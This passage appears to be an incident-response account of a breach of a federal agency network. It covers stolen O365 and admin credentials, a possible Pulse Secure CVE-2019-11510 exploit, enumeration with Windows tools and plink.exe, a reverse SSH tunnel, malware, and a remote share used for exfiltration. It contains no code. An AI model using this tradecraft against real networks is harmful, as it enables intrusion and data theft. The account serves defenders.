A potential network compromise incident is reported on a federal agency’s enterprise network in which the cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and domain administrator accounts. These credentials were used for initial access to the organization’s network. First the threat actor logged into a user’s O365 account and then browsed pages on a SharePoint site and downloaded a file. The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) to the victim organization’s virtual private network (VPN) server. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure, as wide exploitation of CVE-2019-11510 has already been observed.
After initial access, the threat actor logged into an agency O365 email account for viewing and downloading help desk email attachments with “Intranet access” and “VPN passwords” in the subject line, despite already having privileged access. (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) and enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy. Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe—to enumerate the compromised system and network.
The cyber threat actor then attempted multiple times to connect to virtual private server (VPS) through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into VPS via an SMB share. The attacker then executed plink.exe on a victim file server.
The cyber threat actor established Persistence and Command and Control on the victim network by creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, by running inetinfo.exe (a unique, multi-stage malware used to drop files), and by setting up a locally mounted remote share on IP address 78.27.70[.]237. The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis. The cyber threat actor created a local account, which they used for data Collection, Exfiltration. Persistence and Command and Control.